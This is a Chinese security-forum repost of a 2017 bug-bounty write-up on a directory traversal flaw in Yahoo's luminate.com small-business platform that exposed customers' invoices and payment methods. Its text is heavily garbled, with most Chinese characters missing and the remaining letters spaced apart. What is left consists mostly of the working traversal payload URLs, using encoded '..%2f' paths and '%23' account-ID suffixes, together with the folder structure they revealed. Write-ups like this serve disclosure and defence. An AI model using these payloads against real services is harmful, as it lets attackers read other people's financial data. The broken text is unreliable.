搜索

[12046] 2017-11-24_利用雅虎小型企业服务平台的目录遍历漏洞查看客户的信用卡信息

文档创建者:s7ckTeam
浏览次数:40
最后更新:2025-01-18
2017-11-24_利用雅虎小型企业服务平台的目录遍历漏洞查看客户的信用卡信息 A l p h a _ h 4 c k   F r e e B u f   2 0 1 7 - 1 1 - 2 4 西 N o d e J S N o d e J S P D F D o w n l o a d 便 P D F I N V 0 8 1 7 9 4 5 5 I D O R 使 P D F / p d f P D F . p d f ? P D F N o d e J S S Q L P D F H T T P W e b . % 2 f . / N o d e J S . % 2 f I D 使 I D P D F . % 2 . . % 2 f 4 0 4 - n o t   f o u n d P D F P D F P D F h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / I N V 0 8 1 7 9 4 5 5 / p d f N o d e J S   " / v i e w / I D "   P H P " / v i e w . p h p ? i d = I D " h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . % 2 f I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f I N V 0 8 1 7 9 4 5 5 / p d f
i n v o i c e s 4 0 4 - n o t   f o u n d i n v o i c e s 使 I D a c c o u n t I D / i n v o i c e s / I D I D P D F 西 # v j 使 # v j U R L % 2 3 v j 访 使 访 h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f i n v o i c e s % 2 f I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f . . % 2 f m y - s e r v i c e s % 2 f i n v o i c e s % 2 f I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f . . % 2 f s a m w c u r r y @ g m a i l . c o m % 2 f i n v o i c e s % 2 f I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f . . % 2 f a c c o u n t I D h a s h % 2 f i n v o i c e s % 2 f I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f . . % 2 f s a m w c u r r y % 4 0 g m a i l % 2 e c o m % 2 f i n v o i c e s % 2 f I N V 0 8 1 7 9 4 5 5 / p d f h t t p s : / / w w w . l u m i n a t e . c o m / o r d e r / c o n f i r m a t i o n / . . % 2 f o r d e r s % 2 f o r d e r I d h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / m o r e - i n f o / j s o n ? u i d = . . / s u b s c r i p t i o n s / s u b s c r i p t i o n I D h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / e d i t - p a y m e n t - m e t h o d ? u i d = . . / p a y m e n t m e t h o d s / p a y m e n t M e t h o d I D { " e r r o r " : " I d   s a m w c u r r y @ g m a i l . c o m # v j d o e s   n o t   h a v e   p e r m i s s i o n   t o   m o d i f y   t h e   d o m a i n   e x a m p l e . c o m . " }   h t t p s : / / w w w . l u m i n a t e . c o m / m y - s e r v i c e s / i n v o i c e s / . . % 2 f . . % 2 f s a m w c u r r y @ g m a i l . c o m % 2 3 v j % 2 f i n v o i c e s % 2 f I N V 0 8 1 7 9 4 5 5 / p d f -   s a m w c u r r y @ g m a i l . c o m # v j     s e r v i c e s         - s e r v i c e I D   ( f u l l   f o l d e r   s a m w c u r r y @ g m a i l . c o m # v j / s e r v i c e s / s e r v i c e I D )     i n v o i c e s         - i n v o i c e I D   ( f u l l   f o l d e r   s a m w c u r r y @ g m a i l . c o m # v j / i n v o i c e s / i n v o i d e I D )     p a y m e n t m e t h o d s - p a y m e n t M e t h o d I D   ( f u l l   f o l d e r   s a m w c u r r y @ g m a i l . c o m # v j / p a y m e n t m e t h o d s / p a y m e n t M e t h o d I D )
使 I D 2 0 1 7 1 0 2 1 2 0 1 7 1 0 2 3 2 0 1 7 1 1 0 8 *   b u g b o u n t y f o r u m F B A l p h a _ h 4 c k F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理